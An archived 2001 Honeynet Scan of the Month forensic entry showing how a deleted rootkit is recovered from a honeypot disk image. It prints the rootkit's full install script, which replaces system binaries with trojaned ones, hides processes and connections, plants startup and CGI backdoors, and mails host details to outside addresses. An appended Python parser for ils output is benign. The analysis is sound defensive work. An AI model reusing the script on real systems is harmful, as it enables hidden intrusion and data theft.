From alex.butcher@integralis.com Tue May 22 22:36:56 2001
Date: Thu, 3 May 2001 18:31:33 +0100 (BST)
From: Alex Butcher
To: project@honeynet.org
Subject: ENTRY: May Scan of the Month

Hi -

Here's my entry for Honeynet's May 2001 Scan of the Month:

1. Show step by step how you identify and recover the deleted rootkit from the / partition.

First, I mounted the dd image read-only using Linux's loopback filesystem:

mount -o ro,loop honeypot.hda8.dd /honeyroot

Having a look around the filesystem, I noticed a directory '/dev/ida/.. ' which is a typically named hax0r's hidden directory (to an inexperienced sysadmin, it'll just look like a parent directory). Also in /dev/ida was .drag-on, which also caught my attention. I listed the contents of these directories:

=========================================================================
% ls -AlR '.. ' .drag-on/
.. :
total 646
-rwx------   1 root     root         7165 Mar 16 01:45 linsniffer
-rwx------   1 root     root           75 Mar 16 01:45 logclear
-rwxr-xr-x   1 root     root       632066 Mar 16 01:45 mkxfs
-rw-r--r--   1 root     root          708 Mar 16 01:45 s
-rwxr-xr-x   1 root     root         4060 Mar 16 01:45 sense
-rwx------   1 root     root         8268 Mar 16 01:45 sl2
-rw-------   1 root     root          540 Mar 16 01:45 ssh_host_key
-rw-------   1 root     root          512 Mar 16 01:45 ssh_random_seed
-rw-r--r--   1 root     root            0 Mar 16 01:45 tcp.log

.drag-on/:
total 647
-rwx------   1 root     root         7165 Mar 16 01:45 linsniffer
-rwx------   1 root     root           75 Mar 16 01:45 logclear
-rwxr-xr-x   1 root     root       632066 Mar 16 01:45 mkxfs
-rw-r--r--   1 root     root          708 Mar 16 01:45 s
-rwxr-xr-x   1 root     root         4060 Mar 16 01:45 sense
-rwx------   1 root     root         8268 Mar 16 01:45 sl2
-rw-------   1 root     root          540 Mar 16 01:45 ssh_host_key
-rw-------   1 root     root          512 Mar 16 14:45 ssh_random_seed
-rw-r--r--   1 root     root          138 Mar 16 16:28 tcp.log
=========================================================================

Ah-ha, yes, definitely useful back-door tools for an intruder: a sniffer, a tool to put some order in logs generated by the sniffer, and a copy of
ssh (named mkxfs) and keys, and what appears to be a scanner of some sort (sl2).

To take the bonus question first, it would certainly appear that the rootkit WAS installed on the system. We've even captured at least part of it.

Next, I ran lazarus from The Coroner's Toolkit (tct) by Dan Farmer and Wietse Venema (many thanks to both of them for such a useful set of tools!). Lazarus took a long time to run and I kept running out of disc space, so I kept having a look around the stuff it had found in the blocks/ directory. One of the files it recovered was 9086.p.txt, containing an installation script for the rootkit:

=========================================================================
#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA ********************************"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
echo "Are Make !"
else
echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ]; then
echo "Are Gcc !"
else
echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/ ]; then
echo "Are Ssh !"
else
echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm >/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last >/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz
=========================================================================

Hmmm... from the language, it would appear to be a Romanian blackhat's rootkit. Checking /etc/rc.d/rc.sysinit in our loopback-mounted filesystem, we see that it has been modified to run lsattr. The rootkit has *definitely* been installed by the intruder.
Looking through the files that lazarus has recovered, we can even learn the spec of the system from the file it mailed to the two addresses (90418.m.txt), by grepping for 'IfConfig' over the entire set of files:

=========================================================================
To: bidi_damm@yahoo.com
Subject: roote

* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig :           inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
          inet addr:172.16.1.108  Bcast:172.16.1.255  Mask:255.255.255.0
* Uptime :   7:45pm  up  8:23,  0 users,  load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id       : GenuineIntel
* Cpu Model : model           : 4
model name      : Pentium MMX
* Cpu Speed: cpu MHz         : 200.457171
* Bogomips: bogomips        : 399.77
* Spatiu Liber: Filesystem            Size  Used Avail Use% Mounted on
/dev/hda8             251M   33M  205M  14% /
/dev/hda1              23M  2.4M   19M  11% /boot
/dev/hda6             1.6G  2.1M  1.5G   0% /home
/dev/hda5             1.6G  367M  1.2G  23% /usr
/dev/hda7             251M  5.3M  232M   2% /var
=========================================================================

We also know a likely name for the rootkit now: lk.tgz.

Using ils from tct I obtained a listing of removed files:

=========================================================================
% ./bin/ils -r honeypot.hda8.dd
class|host|device|start_time
ils|alex.integralis.co.uk|/dosc/honeynet/honeypot.hda8.dd|988909862
st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|st_nlink|st_size|st_block0|st_block1
23|f|0|0|984706608|984707090|984707105|984707105|100644|0|520333|307|308
...
=========================================================================

Using icat from tct I started extracting removed files one at a time from the dd image by supplying the inode number:

=========================================================================
% ./bin/icat honeypot.hda8.dd 23 >23.txt
=========================================================================

Running file on 23.txt identified it as gzip compressed data. Gunzipping the data and running file on the result identified it as a GNU tar archive. Running tar -tvf on that file gave a listing of the contents and the answer to question 2.

2. What files make up the deleted rootkit?

=========================================================================
% tar -tvf 23
drwxr-xr-x 1031/users        0 2001-02-26 20:40:30 last/
tar: Archive contains future timestamp 2002-02-08 13:08:13
-rwxr-xr-x 1031/users   611931 2002-02-08 13:08:13 last/ssh
-rw-r--r-- 1031/users        1 2001-02-26 15:29:58 last/pidfile
-rwx------ 1031/users     3713 2001-03-03 03:08:37 last/install
-rwx------ 1031/users     7165 2001-02-26 15:22:50 last/linsniffer
-rwxr-xr-x 1031/users     1345 1999-09-09 16:57:11 last/cleaner
-rw-r--r-- 1031/users     3278 2001-01-27 15:11:32 last/inetd.conf
-rwxr-xr-x 1031/users       79 2001-02-26 15:28:40 last/lsattr
-rw-r--r-- 1031/users    11407 2001-01-27 15:11:44 last/services
-rwxr-xr-x 1031/users     4060 2001-02-26 15:22:55 last/sense
-rw-r--r-- 1031/users      880 2000-10-22 20:29:44 last/ssh_config
-rw------- 1031/users      540 2000-10-22 20:29:44 last/ssh_host_key
-rw-r--r-- 1031/users      344 2000-10-22 20:29:44 last/ssh_host_key.pub
-rw------- 1031/users      512 2000-10-22 20:29:44 last/ssh_random_seed
-rw-r--r-- 1031/users      688 2001-02-26 15:29:51 last/sshd_config
-rwx------ 1031/users     8268 2001-02-26 15:22:59 last/sl2
-rwxr-xr-x 1031/users     4620 2001-02-26 15:23:10 last/last.cgi
-rwxr-xr-x 1031/users    33280 2001-02-26 15:23:33 last/ps
-rwxr-xr-x 1031/users    35300 2001-02-26 15:23:42 last/netstat
-rwxr-xr-x 1031/users    19840 2001-02-26 15:23:47 last/ifconfig
-rwxr-xr-x 1031/users    53588 2001-02-26 15:23:55 last/top
-rwx------ 1031/users       75 2001-02-26 15:24:03 last/logclear
-rw-r--r-- root/root        708 2001-03-03 03:05:12 last/s
-rwxr-xr-x 1031/users   632066 2001-02-26 14:46:04 last/mkxfs
=========================================================================

Yup, that'll be the rootkit alright!

Best Regards,
Alex.
-- 
Alex Butcher                                       PGP/GnuPG Key IDs:
Consultant, S3 Systems Security Services           alex@s3          B7709088
PGP: http://www.s3.integralis.co.uk/pgp/alex.pgp   alex.butcher@    885BA6CE
Integralis Theale House Brunel Road Theale, Reading RG7 4AQ +44 (0) 118 9306060
A member of the Articon-Integralis Group info@Integralis.com http://www.integralis.com
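An added example, not part of Alex's entry: a small Python parser for the pipe-delimited output of ils -r quoted above. It converts the epoch timestamps to UTC and the octal st_mode to ls-style text, so the one record shown (inode 23, the deleted tarball) can be placed on a timeline next to the Mar 16 dates in the ls listing. The sample input is the header and record copied from the entry; the helper names (parse_ils, describe, deleted_window) are my own.

```python
from datetime import datetime, timezone
import stat

# Constructed sample: the preamble, column header and single record from the
# ils -r run quoted in the entry. ils prints two run-description lines, then a
# column-name line, then one pipe-delimited record per unallocated inode.
SAMPLE_ILS = """class|host|device|start_time
ils|alex.integralis.co.uk|/dosc/honeynet/honeypot.hda8.dd|988909862
st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|st_nlink|st_size|st_block0|st_block1
23|f|0|0|984706608|984707090|984707105|984707105|100644|0|520333|307|308
"""

TIME_FIELDS = ("st_mtime", "st_atime", "st_ctime", "st_dtime")


def parse_ils(text):
    """Parse ils body output into a list of dicts keyed by column name."""
    lines = [l for l in text.splitlines() if l.strip()]
    columns = lines[2].split("|")          # third line names the columns
    records = []
    for line in lines[3:]:
        rec = dict(zip(columns, line.split("|")))
        for f in TIME_FIELDS:
            rec[f] = int(rec[f])           # epoch seconds
        rec["st_mode"] = int(rec["st_mode"], 8)   # mode is printed in octal
        rec["st_size"] = int(rec["st_size"])
        rec["st_ino"] = int(rec["st_ino"])
        records.append(rec)
    return records


def utc(ts):
    """Render an epoch timestamp as a UTC date string (no local-TZ surprises)."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def describe(rec):
    """One unallocated inode as a timeline-friendly line (M/A/C/D = mtime/atime/ctime/dtime)."""
    return "inode %d %s %7d bytes  M:%s A:%s C:%s D:%s" % (
        rec["st_ino"], stat.filemode(rec["st_mode"]), rec["st_size"],
        utc(rec["st_mtime"]), utc(rec["st_atime"]), utc(rec["st_ctime"]), utc(rec["st_dtime"]))


def deleted_window(records, start, end):
    """Inode numbers whose deletion time (st_dtime) falls within [start, end] epoch seconds."""
    return [r["st_ino"] for r in records if start <= r["st_dtime"] <= end]


if __name__ == "__main__":
    for r in parse_ils(SAMPLE_ILS):
        print(describe(r))
```

Candidates in a chosen window are then the inode numbers to hand to icat, exactly as the entry does with inode 23.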